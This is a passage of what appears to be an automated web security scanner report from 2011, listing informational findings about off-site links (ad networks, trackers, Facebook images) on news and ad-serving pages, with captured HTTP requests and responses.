<td id="adImage" rowspan="2" class="adImage1_83" valign="top" align="left">
<a href="http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http://www.smarterlifestyles.com/2011/09/07/multiply-your-money/?fc_id=30752&fc_app_id=3695" target="_blank">
<img src="http://static.cdn.adblade.com/banners/images/80x60/4e6769da83d19.jpg" border="0" />
...[SNIP]...
<div class="descriptionScrool1_83">
<a class="adDescription1_83" id="adDescription1_0" href="http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http://www.smarterlifestyles.com/2011/09/07/multiply-your-money/?fc_id=30752&fc_app_id=3695" target="_blank">
The insider secret into multiplying your money...</a>
...[SNIP]...
<td id="adImage" rowspan="2" class="adImage1_83" valign="top" align="left">
<a href="http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http://web.adblade.com/clicks.php?appId=3695&zid=4e2ec8f4b8f99&adId=29709&pos=3&impt=1315404854.32171791490&zoneId=83" target="_blank">
<img src="http://static.cdn.adblade.com/banners/images/80x60/4e2ec8f49fad4.gif" border="0" />
...[SNIP]...
<div class="descriptionScrool1_83">
<a class="adDescription1_83" id="adDescription2_0" href="http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http://web.adblade.com/clicks.php?appId=3695&zid=4e2ec8f4b8f99&adId=29709&pos=3&impt=1315404854.32171791490&zoneId=83" target="_blank">
Texas: Is it a scam? We investigated a work at home story and what we found may shock you!</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

14.77. http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/news/2011-09-07/christmas-island-inquest-reopens/2875554/

Issue detail

The page was loaded from a URL containing a query string:

http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/?site=perth&section=news

The response contains the following links to other domains:

http://maps.google.com/?q=Perth&ll=-31.9234,115.8834&z=5
http://s7.addthis.com/js/250/addthis_widget.js
http://statse.webtrendslive.com/dcsg85fae000004n0vfjpj8oa_9m4q/njs.gif?dcsuri=/nojavascript&WT.js=No

Request

GET /news/2011-09-07/christmas-island-inquest-reopens/2875554/?site=perth&section=news HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABCGuestID=http%3A//www.abc.net.au/perth/news/%3DPerth%20News%20-%20ABC%20Perth%20-%20Australian%20Broadcasting%20Corporation; __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315476868902:ss=1315476868902; SiteLifeHost=SJL02WSITEMABC1proddmlocal; anonId=f1e9cf78-d41c-4410-9c98-2b8c34e350af

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=307
Expires: Wed, 07 Sep 2011 14:25:33 GMT
Date: Wed, 07 Sep 2011 14:20:26 GMT
Content-Length: 34453
Connection: close

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<li class="expandable">
<a href="http://maps.google.com/?q=Perth&ll=-31.9234,115.8834&z=5" onclick="if (typeof showMap == 'function') return showMap(this, '100%', -31.9234, 115.8834, 'Perth 6000');">
<strong>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<noscript>
       <img alt="" style="border:0;" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsg85fae000004n0vfjpj8oa_9m4q/njs.gif?dcsuri=/nojavascript&WT.js=No">
   </noscript>
...[SNIP]...

14.78. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adfusion.com
Path:	/Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=

The response contains the following links to other domains:

http://aranet.vo.llnwd.net/o28/resources/100x75/2809_ed01974a-c4e0-4f94-94b0-0b2ce9436059.jpg
http://aranet.vo.llnwd.net/o28/resources/100x75/3164_eab845b4-b7d0-45e0-858d-a7046bc10015.jpg
http://aranet.vo.llnwd.net/o28/resources/100x75/3429_2a6a3c13-8c81-4821-b557-12d5b08e9dcd.jpg
http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d2809%26ComboId%3d17925%26title%3dShocking-discovery-for-joint-relief%26origin%3d222833-APP7%26subid%3d0000782303%26segments%3d
http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3164%26ComboId%3d20655%26title%3dHow-your-brain-is-wired-to-learn-a-language-in-10-%26origin%3d222833-APP7%26subid%3d0000782303%26segments%3d
http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3429%26ComboId%3d22946%26title%3dHow-to-find-the-best-Medicare-Supplement-Insurance%26origin%3d222833-APP7%26subid%3d0000782303%26segments%3d

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:57 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Wed, 07-Mar-2012 15:16:57 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5685

<div id="theme728x90A03H0F1L1P0000V1_1Container"><style type="text/css" media="screen">#theme728x90A03H0F1L1P0000V1_1Container #theme728x90A03H0F1L1P0000V1_1{margin: 0;padding: 0;width: 728px;height:
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d2809%26ComboId%3d17925%26title%3dShocking-discovery-for-joint-relief%26origin%3d222833-APP7%26subid%3d0000782303%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/2809_ed01974a-c4e0-4f94-94b0-0b2ce9436059.jpg" width="100" height="75"></a></td><td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d2809%26ComboId%3d17925%26title%3dShocking-discovery-for-joint-relief%26origin%3d222833-APP7%26subid%3d0000782303%26segments%3d"><h4>
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3164%26ComboId%3d20655%26title%3dHow-your-brain-is-wired-to-learn-a-language-in-10-%26origin%3d222833-APP7%26subid%3d0000782303%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/3164_eab845b4-b7d0-45e0-858d-a7046bc10015.jpg" width="100" height="75"></a></td><td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3164%26ComboId%3d20655%26title%3dHow-your-brain-is-wired-to-learn-a-language-in-10-%26origin%3d222833-APP7%26subid%3d0000782303%26segments%3d"><h4>
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3429%26ComboId%3d22946%26title%3dHow-to-find-the-best-Medicare-Supplement-Insurance%26origin%3d222833-APP7%26subid%3d0000782303%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/3429_2a6a3c13-8c81-4821-b557-12d5b08e9dcd.jpg" width="100" height="75"></a></td><td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36912405=_4e677c61,6062761884,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36912405/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3429%26ComboId%3d22946%26title%3dHow-to-find-the-best-Medicare-Supplement-Insurance%26origin%3d222833-APP7%26subid%3d0000782303%26segments%3d"><h4>
...[SNIP]...

14.79. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adfusion.com
Path:	/Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=

The response contains the following links to other domains:

http://aranet.vo.llnwd.net/o28/resources/100x75/2809_ed01974a-c4e0-4f94-94b0-0b2ce9436059.jpg
http://aranet.vo.llnwd.net/o28/resources/100x75/3164_eab845b4-b7d0-45e0-858d-a7046bc10015.jpg
http://aranet.vo.llnwd.net/o28/resources/100x75/3429_2a6a3c13-8c81-4821-b557-12d5b08e9dcd.jpg
http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d2809%26ComboId%3d17925%26title%3dShocking-discovery-for-joint-relief%26origin%3d168068-APP4%26subid%3d0000782303%26segments%3d
http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3164%26ComboId%3d20655%26title%3dHow-your-brain-is-wired-to-learn-a-language-in-10-%26origin%3d168068-APP4%26subid%3d0000782303%26segments%3d
http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3429%26ComboId%3d22946%26title%3dHow-to-find-the-best-Medicare-Supplement-Insurance%26origin%3d168068-APP4%26subid%3d0000782303%26segments%3d

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:13 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Wed, 07-Mar-2012 15:18:13 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5685

<div id="theme728x90A03H0F1L1P0000V1_1Container"><style type="text/css" media="screen">#theme728x90A03H0F1L1P0000V1_1Container #theme728x90A03H0F1L1P0000V1_1{margin: 0;padding: 0;width: 728px;height:
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d2809%26ComboId%3d17925%26title%3dShocking-discovery-for-joint-relief%26origin%3d168068-APP4%26subid%3d0000782303%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/2809_ed01974a-c4e0-4f94-94b0-0b2ce9436059.jpg" width="100" height="75"></a></td><td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d2809%26ComboId%3d17925%26title%3dShocking-discovery-for-joint-relief%26origin%3d168068-APP4%26subid%3d0000782303%26segments%3d"><h4>
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3164%26ComboId%3d20655%26title%3dHow-your-brain-is-wired-to-learn-a-language-in-10-%26origin%3d168068-APP4%26subid%3d0000782303%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/3164_eab845b4-b7d0-45e0-858d-a7046bc10015.jpg" width="100" height="75"></a></td><td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3164%26ComboId%3d20655%26title%3dHow-your-brain-is-wired-to-learn-a-language-in-10-%26origin%3d168068-APP4%26subid%3d0000782303%26segments%3d"><h4>
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3429%26ComboId%3d22946%26title%3dHow-to-find-the-best-Medicare-Supplement-Insurance%26origin%3d168068-APP4%26subid%3d0000782303%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/3429_2a6a3c13-8c81-4821-b557-12d5b08e9dcd.jpg" width="100" height="75"></a></td><td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=36271028=_4e677d58,1367716117,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=36271028/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3429%26ComboId%3d22946%26title%3dHow-to-find-the-best-Medicare-Supplement-Insurance%26origin%3d168068-APP4%26subid%3d0000782303%26segments%3d"><h4>
...[SNIP]...

14.80. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adfusion.com
Path:	/Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=

The response contains the following links to other domains:

http://aranet.vo.llnwd.net/o28/resources/100x75/2809_ed01974a-c4e0-4f94-94b0-0b2ce9436059.jpg
http://aranet.vo.llnwd.net/o28/resources/100x75/3164_eab845b4-b7d0-45e0-858d-a7046bc10015.jpg
http://aranet.vo.llnwd.net/o28/resources/100x75/3429_2a6a3c13-8c81-4821-b557-12d5b08e9dcd.jpg
http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d2809%26ComboId%3d17925%26title%3dShocking-discovery-for-joint-relief%26origin%3d168069-APP5%26subid%3d0000782303%26segments%3d
http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3164%26ComboId%3d20655%26title%3dHow-your-brain-is-wired-to-learn-a-language-in-10-%26origin%3d168069-APP5%26subid%3d0000782303%26segments%3d
http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3429%26ComboId%3d22946%26title%3dHow-to-find-the-best-Medicare-Supplement-Insurance%26origin%3d168069-APP5%26subid%3d0000782303%26segments%3d

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:43 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Wed, 07-Mar-2012 15:14:43 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5673

<div id="theme728x90A03H0F1L1P0000V1_1Container"><style type="text/css" media="screen">#theme728x90A03H0F1L1P0000V1_1Container #theme728x90A03H0F1L1P0000V1_1{margin: 0;padding: 0;width: 728px;height:
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d2809%26ComboId%3d17925%26title%3dShocking-discovery-for-joint-relief%26origin%3d168069-APP5%26subid%3d0000782303%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/2809_ed01974a-c4e0-4f94-94b0-0b2ce9436059.jpg" width="100" height="75"></a></td><td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d2809%26ComboId%3d17925%26title%3dShocking-discovery-for-joint-relief%26origin%3d168069-APP5%26subid%3d0000782303%26segments%3d"><h4>
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3164%26ComboId%3d20655%26title%3dHow-your-brain-is-wired-to-learn-a-language-in-10-%26origin%3d168069-APP5%26subid%3d0000782303%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/3164_eab845b4-b7d0-45e0-858d-a7046bc10015.jpg" width="100" height="75"></a></td><td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3164%26ComboId%3d20655%26title%3dHow-your-brain-is-wired-to-learn-a-language-in-10-%26origin%3d168069-APP5%26subid%3d0000782303%26segments%3d"><h4>
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3429%26ComboId%3d22946%26title%3dHow-to-find-the-best-Medicare-Supplement-Insurance%26origin%3d168069-APP5%26subid%3d0000782303%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/3429_2a6a3c13-8c81-4821-b557-12d5b08e9dcd.jpg" width="100" height="75"></a></td><td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3d2371445c-a53a-4dfc-b41b-d796be2cd87a%26ArticleId%3d3429%26ComboId%3d22946%26title%3dHow-to-find-the-best-Medicare-Supplement-Insurance%26origin%3d168069-APP5%26subid%3d0000782303%26segments%3d"><h4>
...[SNIP]...

14.81. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/connect/connect.php?id=290190314438&stream=0&connections=10&css=

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-ash2/273213_591500743_734678_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186630_621045523_3236212_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187890_290190314438_1203785_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211520_1476060411_3181847_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/260744_100001512587839_5953885_q.jpg
